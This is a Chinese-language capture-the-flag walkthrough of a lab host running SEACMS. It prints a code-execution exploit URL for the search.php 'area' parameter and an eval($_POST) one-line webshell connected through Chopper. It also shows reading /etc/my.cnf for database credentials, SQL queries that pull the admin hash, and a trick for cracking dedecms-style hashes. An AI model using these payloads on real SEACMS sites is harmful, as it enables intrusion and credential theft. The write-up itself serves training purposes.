您好,登錄后才能下訂單哦!
這篇文章主要介紹“CTF主機滲透實戰分析”的相關知識,小編通過實際案例向大家展示操作過程,操作方法簡單快捷,實用性強,希望這篇“CTF主機滲透實戰分析”文章能幫助大家解決問題。
實戰此題如下:
此道題一共需要拿到5個flag,從哪里入手呢?
第一步:首先我們打開連接地址:http://202.0.0.206
第二步:漏洞分析
根據分析,此道題是一個SEACMS的平臺系統
該版本通過其他論壇平臺了解到存在一個代碼執行漏洞。Exp:/search.php?searchtype=5&tid=&area=phpinfo()。我們來試試此漏洞能夠利用,直接在后面的phpinfo()就可以執行任意php代碼直接訪問http:// 202.0.0.206/search.php?searchtype=5&tid=&area=phpinfo()發現phpinfo()執行成功了,說明該漏洞存在。
我們嘗試看看源碼中有沒有flag,右鍵打開此頁面的源碼,在源碼果然有一個flag= flag1{ac727d1a3130e4093b3665120a3240a5}
第三步:一句話木馬利用
接下來我們利用一句話木馬來利用。
使用使用exp:/search.php?searchtype=5&tid=&area=eval($_POST[simple])構造一句話小馬。
打開工具菜刀,在地址欄中填寫
http://202.0.0.206/search.php?searchtype=5&tid=&area=eval($_POST[simple]),密碼為simple,點擊添加
連接成功了,如下:
第四步:胡亂搗騰
接下來就是耗時的去找了,如小偷進家,沒有目的只能胡亂的翻了!
費時很久在 /home目錄下發現有key文件,打開文件,獲得flag2=
flag2{6634eaf4ce34a82da12d835c1ed86a24}
在 /etc目錄下的my.cnf關于數據庫mysql的配置文件。發現flag3和數據庫相關賬戶信息。flag3{da04113d21f02f0ebfd281d0a7a64e34},并且得到了數據庫的密碼。
第五步:數據庫操作
在上一步獲取到關于數據庫的用戶名和密碼,使用用戶名和密碼,重新配置菜刀,連接數據庫。
提交打開數據庫,在seacms中的flag表中,找到一個flag= flag4{32730c5cc0bd7bb8ffde4457649fd409}
分別在數據庫中查詢seacms的后臺的賬號密碼
SELECT `name` FROM `sea_admin`
SELECT `password` FROM `sea_admin`
第六步:密碼破解
取到的密碼是MD5加密,密碼為:23a7bbd73250516f069d 百度MD5在線解密,發現該加密值是20位,使用了和dedecms一樣的加密方式,將該加密值的前三位和最后一位去掉,就是16位的MD5加密,在線解密結果是admin123。
第六步:找后臺登錄頁面
接下來找到網站的后臺登錄頁面,我們這里使用DirBuster工具。
使用在數據庫中已經獲得的用用戶名和密碼,登錄網站后臺密碼是admin123。
好了,登錄成功,我們拿到了后臺登錄頁面,并可以使用管理員賬號登錄。
第七步:胡亂搗騰
在后臺逛了半天,終于在網站后臺查找計劃任務時,發現key5。
flag5{f01cbadfd0daee0d65c2502a38581558}
最后,到此為止,5個flag全部找出來了,接下來我們把5個flag放入答題框。
關于“CTF主機滲透實戰分析”的內容就介紹到這里了,感謝大家的閱讀。如果想了解更多行業相關的知識,可以關注億速云行業資訊頻道,小編每天都會為大家更新不同的知識點。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。